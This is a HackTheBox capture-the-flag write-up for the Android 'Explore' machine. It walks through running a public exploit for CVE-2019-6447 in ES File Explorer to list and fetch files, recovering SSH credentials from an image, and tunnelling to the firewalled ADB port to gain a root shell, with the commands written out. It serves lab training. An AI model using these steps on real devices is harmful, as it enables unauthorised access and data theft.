---
description: Explore writeup by Thamizhiniyan C S
---

# Explore

## Overview

Hello everyone, In this blog we are going to solve Explore from HackTheBox.

Link for the machine : [https://app.hackthebox.com/machines/356](https://app.hackthebox.com/machines/356)

Lets Start ðŸ™Œ

Connect to the HTB server by using the OpenVpn configuration file thatâ€™s generated by HTB.

\[ [Click Here](https://help.hackthebox.com/en/articles/5185687-introduction-to-lab-access) to learn more about how to connect to vpn and access the boxes. ]

After connecting to the vpn service, click on Join Machine to access the machineâ€™s ip.

After joining the machine you can see the IP Address of the target machine.

***

## Reconnaissance

### Rustscan

First I started by scanning for open ports on the target machine.

<figure><img src="../../.gitbook/assets/Untitled (17).png" alt=""><figcaption></figcaption></figure>

<figure><img src="../../.gitbook/assets/Untitled 1 (18).png" alt=""><figcaption></figcaption></figure>

<figure><img src="../../.gitbook/assets/Untitled 2 (17).png" alt=""><figcaption></figcaption></figure>

### Results

From the scan results we have found the following open ports:

| Port  | Service | Version |
| ----- | ------- | ------- |
| 2222  | SSH     | ssh2.0  |
| 46173 | unknown | unknown |
| 59777 | HTTP    | -       |

***

## Port 59777

On searching about the port 59777, found the following:&#x20;

{% embed url="https://github.com/fs0c131y/ESFileExplorerOpenPortVuln" %}

On further research about the **CVE-2019-6447,** found the following exploit:&#x20;

{% embed url="https://www.exploit-db.com/exploits/50070" %}

Download the exploit and run it with python 3

<figure><img src="../../.gitbook/assets/Untitled 3 (18).png" alt=""><figcaption></figcaption></figure>

Now to list the files, execute the following command:`python3 50070.py listFiles 10.10.10.247 | grep name`

<figure><img src="../../.gitbook/assets/Untitled 4 (18).png" alt=""><figcaption></figcaption></figure>

Based on the output, nothing interesting was found. Next I tried to list the pictures.

Command:`python3 50070.py listPics 10.10.10.247`

<figure><img src="../../.gitbook/assets/Untitled 5 (18).png" alt=""><figcaption></figcaption></figure>

From the output, we can see a picture named `creds.jpg`, which sounds interesting.

So I decided to take a look it and downloaded the picture using the command:

`python3 50070.py getFile 10.10.10.247 /storage/emulated/0/DCIM/creds.jpg`

<figure><img src="../../.gitbook/assets/Untitled 6 (18).png" alt=""><figcaption></figcaption></figure>

Open the `out.dat` file with a image viewer.

<figure><img src="../../.gitbook/assets/Untitled 7 (15).png" alt=""><figcaption></figcaption></figure>

***

## Initial Access

From the image, we have got the following credentials: `kristi:Kr1sT!5h@Rp3xPl0r3!`

Now try to login via SSH to the target using the found credentials.

While trying to login via SSH got the following error:

<figure><img src="../../.gitbook/assets/Untitled 8 (15).png" alt=""><figcaption></figcaption></figure>

On searching for solution for the above error, found this:&#x20;

{% embed url="https://support.genymotion.com/hc/en-us/articles/9500420360093-I-get-the-error-no-matching-host-key-type-found-Their-offer-ssh-rsa-when-trying-to-connect-with-SSH" %}

To fix the error, use the `ssh` command as shown below:

Command:`ssh -p 2222 -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.10.10.247`

<figure><img src="../../.gitbook/assets/Untitled 9 (15).png" alt=""><figcaption></figcaption></figure>

We have successfully logged in.

***

## Getting the User Flag

On surfing the file system, I found the flag at `/sdcard/` location.

<figure><img src="../../.gitbook/assets/Untitled 10 (15).png" alt=""><figcaption></figcaption></figure>

***

## Getting the Root Flag

Next its time to escalate our privileges. I was looking out for privilege escalation vectors and found the `/etc/init.sh` script.

<figure><img src="../../.gitbook/assets/Untitled 11 (14).png" alt=""><figcaption></figcaption></figure>

On viewing the contents of the script, we can see that firewall blocks all the connections to the port 5555 from the outside and only allows access to it from localhost.

By default, ADB runs on port 5555.&#x20;

{% embed url="https://book.hacktricks.xyz/network-services-pentesting/5555-android-debug-bridge" %}

If we can connect to this device via adb, we can try to escalate our privileges.

For that first we need adb. I have it one my local machine. Since, firewall blocks external connections to port 5555, we have to create a tunnel to the target machine, and then use adb to escalate our privilege.

To create a tunnel I used SSH.

```bash
# Creating a tunnel to the target machine via SSH
ssh -p 2222 -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa kristi@10.10.10.247 -L localhost:5555:localhost:5555 -fN

# Here
# -L - Creates a link between the target machine port and our local machine port\
# -N - Tells SSH that we don't want to exectue any commands
# -f - Runs SSH in background
```

<figure><img src="../../.gitbook/assets/Untitled 12 (14).png" alt=""><figcaption></figcaption></figure>

After executing the command successfully, we can now connect to the target via adb using the command: `adb connect localhost:5555`

<figure><img src="../../.gitbook/assets/Untitled 13 (14).png" alt=""><figcaption></figcaption></figure>

Now lets open the interactive shell using the command: `adb -s localhost:5555 shell`

<figure><img src="../../.gitbook/assets/Untitled 14 (13).png" alt=""><figcaption></figcaption></figure>

Now use the `su` command to escalate our privilege as sudo/root.

<figure><img src="../../.gitbook/assets/Untitled 15 (12).png" alt=""><figcaption></figcaption></figure>

Found the flag at `/data/` directory.

<figure><img src="../../.gitbook/assets/Untitled 16 (11).png" alt=""><figcaption></figcaption></figure>

We have successfully found the root flag.

Thank Youâ€¦â€¦..
